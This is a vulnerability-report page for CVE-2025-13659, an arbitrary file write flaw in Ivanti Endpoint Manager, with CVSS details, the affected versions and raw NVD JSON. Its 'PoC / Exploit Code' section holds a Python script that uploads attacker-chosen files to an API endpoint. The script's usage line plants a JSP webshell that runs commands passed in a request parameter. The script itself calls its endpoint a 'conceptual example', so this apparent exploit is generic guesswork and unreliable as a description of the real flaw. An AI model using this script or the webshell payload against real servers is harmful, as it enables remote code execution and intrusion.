Security Vulnerability Report
中文
CVE-2025-13659 CVSS 8.8 HIGH

CVE-2025-13659

Published: 2025-12-09 16:17:36
Last Modified: 2025-12-11 17:35:16
Source: 3c1d8aa1-5a33-4ea4-8992-aadd6440af75

Description

Improper control of dynamically managed code resources in Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote, unauthenticated attacker to write arbitrary files on the server, potentially leading to remote code execution. User interaction is required.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ivanti:endpoint_manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ivanti:endpoint_manager:2024:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ivanti:endpoint_manager:2024:su1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ivanti:endpoint_manager:2024:su2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ivanti:endpoint_manager:2024:su3:*:*:*:*:*:* - VULNERABLE
Ivanti Endpoint Manager < 2024 SU4 SR1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-13659 PoC - Ivanti Endpoint Manager Arbitrary File Write # Target: Ivanti Endpoint Manager < 2024 SU4 SR1 def exploit(target_url, file_path, file_content): """ Exploit arbitrary file write vulnerability in Ivanti EPM """ # Construct the exploit URL # Note: Actual endpoint may vary, this is a conceptual example exploit_url = f"{target_url}/api/v1/file/upload" # Prepare the malicious file content (e.g., webshell) payload = { 'file': (file_path, file_content, 'application/octet-stream'), 'path': file_path } try: # Send the exploit request response = requests.post(exploit_url, files=payload, timeout=30) if response.status_code == 200: print(f"[+] File written successfully: {file_path}") print(f"[+] Access the file at: {target_url}/{file_path}") return True else: print(f"[-] Exploitation failed. Status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def check_version(target_url): """ Check if target is vulnerable based on version """ version_url = f"{target_url}/api/v1/system/version" try: response = requests.get(version_url, timeout=10) if response.status_code == 200: version_info = response.json() print(f"[*] Target version: {version_info}") return True except: pass return False if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve-2025-13659.py <target_url> <file_path> <file_content>") print("Example: python cve-2025-13659.py http://target.com /webshell.jsp '<%Runtime.getRuntime().exec(request.getParameter(\"cmd\"));%>'") sys.exit(1) target = sys.argv[1] path = sys.argv[2] content = sys.argv[3] print(f"[*] Targeting: {target}") check_version(target) exploit(target, path, content)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13659", "sourceIdentifier": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "published": "2025-12-09T16:17:35.940", "lastModified": "2025-12-11T17:35:16.487", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper control of dynamically managed code resources in Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote, unauthenticated attacker to write arbitrary files on the server, potentially leading to remote code execution. User interaction is required."}], "metrics": {"cvssMetricV31": [{"source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "type": "Primary", "description": [{"lang": "en", "value": "CWE-913"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:*:*:*:*:*:*:*:*", "versionEndExcluding": "2024", "matchCriteriaId": "7ABDE6FE-56CC-4A46-91F2-2F54C3EC6A75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:-:*:*:*:*:*:*", "matchCriteriaId": "6C7283FE-C10A-4E37-B004-15FB0CAC49A5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su1:*:*:*:*:*:*", "matchCriteriaId": "FC51EEA2-1C4C-4069-9704-7ACFE4773930"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su2:*:*:*:*:*:*", "matchCriteriaId": "E1EF5E1B-9377-49D3-9BE3-62FC78E666A3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su3:*:*:*:*:*:*", "matchCriteriaId": "749AADDA-834D-4EC0-B7FF-E136FD1984F7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su3_security_release_1:*:*:*:*:*:*", "matchCriteriaId": "698BF7A1-62A1-45B5-BF08-AB3F3AA0245C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su4:*:*:*:*:*:*", "matchCriteriaId": "4902A745-E7CB-4FC9-9BCB-89EFAB643237"}]}]}], "references": [{"url": "https://forums.ivanti.com/s/article/Security-Advisory-EPM-December-2025-for-EPM-2024", "source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.